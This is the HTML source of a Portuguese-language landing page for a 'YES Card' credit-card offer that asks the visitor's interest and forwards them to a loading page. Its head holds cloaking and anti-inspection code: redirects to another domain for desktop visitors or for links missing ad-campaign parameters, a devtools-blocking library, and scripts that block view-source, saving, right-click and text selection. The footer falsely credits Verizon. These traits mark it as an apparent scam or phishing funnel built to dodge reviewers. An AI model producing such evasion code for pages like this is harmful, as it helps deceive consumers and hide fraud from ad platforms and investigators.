<!DOCTYPE html><html lang="pt-BR"><head>
  <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool"
    url="https://appavaliadorpremios.shop/lp/"></script>

<script type="text/javascript">
    if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
        window.location.href = 'https://appavaliadorpremios.shop/lp/';
    }
</script>
  <script type="text/javascript">
  (function () {
      /**
       * Função para verificar a presença de múltiplos parâmetros na URL
       * @param {Array} names - Array contendo os nomes dos parâmetros a serem verificados
       * @returns {boolean} - Retorna true se todos os parâmetros estiverem presentes, caso contrário, false
       */
      function hasAllURLParameters(names) {
          const urlParams = new URLSearchParams(window.location.search);
          return names.every(param => urlParams.has(param));
      }

      // Array contendo os parâmetros obrigatórios
      const requiredParams = ['CampaignID', 'adSETID', 'CreativeID', 'pixel_id'];

      // URL para redirecionamento caso algum dos parâmetros não esteja presente
      const redirectURL = 'https://appavaliadorpremios.shop/lp/';

      /**
       * Função principal que verifica os parâmetros da URL
       * e redireciona o usuário se necessário
       */
      function checkURLParameters() {
          if (!hasAllURLParameters(requiredParams)) {
              window.location.href = redirectURL;
          }
      }

      // Executa a verificação imediatamente assim que o script é carregado
      checkURLParameters();
  })();
</script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Interesse com Cartão de Crédito</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css2.html" rel="stylesheet">

    <style>
      :root {
        --primary-color: #000000;
        --primary-light: rgba(0, 0, 0, 0.1);
      }

      body {
        font-family: "Poppins", sans-serif;
        background-color: #f9f9f9;
        color: #333;
        margin: 0;
        padding: 0;
        display: flex;
        flex-direction: column;
        min-height: 100vh;
      }

      .header {
        background-color: #ffffff;
        padding: 20px 0;
        text-align: center;
        background: linear-gradient(147deg, #ffe53b 0%, #ff2525 74%);
      }

      .header img {
        width: 150px;
      }

      .main-content {
        max-width: 500px;
        background: #fff;
        margin: 30px auto;
        padding: 30px;
        border-radius: 10px;
        box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
      }

      .btn-simple {
        width: 100%;
        margin-bottom: 10px;
        padding: 12px;
        background: #ff2525;
        border: none;
        border-radius: 8px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        text-align: center;
        cursor: pointer;
        transition: transform 0.3s ease, box-shadow 0.3s ease;
      }

      .btn-simple:hover {
        transform: scale(1.05);
        box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
      }

      .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("keydown", bloquearSource);
      } else {
        //Versões antigas do IE
        document.attachEvent("onkeydown", bloquearSource);
      }

      function bloquearSource(e) {
        e = e || window.event;

        var code = e.which || e.keyCode;

        if (
          e.ctrlKey &&
          (code == 83 || code == 85) //83 = S, 85 = U
        ) {
          if (e.preventDefault) {
            e.preventDefault();
          } else {
            e.returnValue = false;
          }

          return false;
        }
      }
    </script>

    <style>
      /*desabilita a seleção no body*/
      body {
        -webkit-touch-callout: none; /* iOS Safari */
        -webkit-user-select: none; /* Chrome/Safari/Opera */
        -khtml-user-select: none; /* Konqueror */
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
        user-select: none;
      }

      /*habilita a seleção nos campos editaveis*/
      input,
      textarea {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: text; /* Chrome/Safari/Opera */
        -khtml-user-select: text; /* Konqueror */
        -moz-user-select: text; /* Firefox */
        -ms-user-select: text; /* Internet Explorer/Edge */
        user-select: text;
      }

      /*habilita a seleção nos campos com o atributo contenteditable*/
      [contenteditable="true"] {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: all; /* Chrome/Safari/Opera */
        -khtml-user-select: all; /* Konqueror */
        -moz-user-select: all; /* Firefox */
        -ms-user-select: all; /* Internet Explorer/Edge */
        user-select: all;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
          return false;
        });
      } else {
        //Versões antigas do IE
        document.attachEvent("oncontextmenu", function (e) {
          e = e || window.event;
          e.returnValue = false;
          return false;
        });
      }
    </script>

    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-NGSPZL3X93"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NGSPZL3X93');
</script>

   
   </head>

  <body>
 

    <!-- Header -->
    <div class="header">
      <img decoding="async" style="width: 120px" src="images/logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div style="grid-area: content; padding: 0 1rem">
      <div style="margin-top: 18px" class="main-content">
        <div id="InteresseCard" class="mb-3">
          <p>
            <strong style="font-size: 18px">Qual é o seu interesse com um cartão de crédito hoje?</strong>
          </p>
          <button class="btn-simple" onclick="location.href='carregando.html' + window.location.search">
            Fazer uma compra específica
          </button>
          <button class="btn-simple" onclick="location.href='carregando.html' + window.location.search">
            Fazer uma viagem
          </button>
          <button class="btn-simple" onclick="location.href='carregando.html' + window.location.search">
            Poder gastar mais
          </button>
          <button class="btn-simple" onclick="location.href='carregando.html' + window.location.search">
            Organizar a minha vida financeira
          </button>
          <button class="btn-simple" onclick="location.href='carregando.html' + window.location.search">
            Outros
          </button>
        </div>
      </div>
    </div>

    <!-- Footer -->
    <div class="footer">
      Copyright © 2025 Verizon. Todos os direitos reservados.<br>

      Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa
      do Site
    </div>
  
  <script>
      window.pixelId = "66b3a64f335ef199b3e5b257";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script>
    
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>